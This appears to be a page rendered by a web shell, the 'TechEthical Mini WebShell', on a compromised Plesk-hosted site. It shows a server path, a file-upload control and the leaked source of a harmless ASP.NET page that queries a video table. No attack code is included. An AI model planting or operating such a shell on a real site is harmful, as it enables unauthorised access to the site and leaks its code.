TechEthical CEHP

Current Path : G:/PleskVhosts/megamind.net.in/careercentre360.com/
Upload File :
Current File : G:/PleskVhosts/megamind.net.in/careercentre360.com/Video-Motivational-Speeches.aspx.cs

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using Microsoft.SqlServer;
using System.Data.SqlClient;
using System.Data;
using Directory;

namespace Bathuasoft
{
    public partial class Video_Motivational_Speeches : System.Web.UI.Page
	{
		public DataSet ds = new DataSet();

        protected void Page_Load(object sender, EventArgs e)
        {
            connection_sql obj = new connection_sql();
            obj.MakeConnection();
            ds = obj.getDataSet("Select top 500 * from tbl_VideoMotivationalSpeeches order by id desc");
            obj.CloseConnection();
        }
	}
}

TechEthical Mini WebShell Version 1.0, Coded By The_M@T3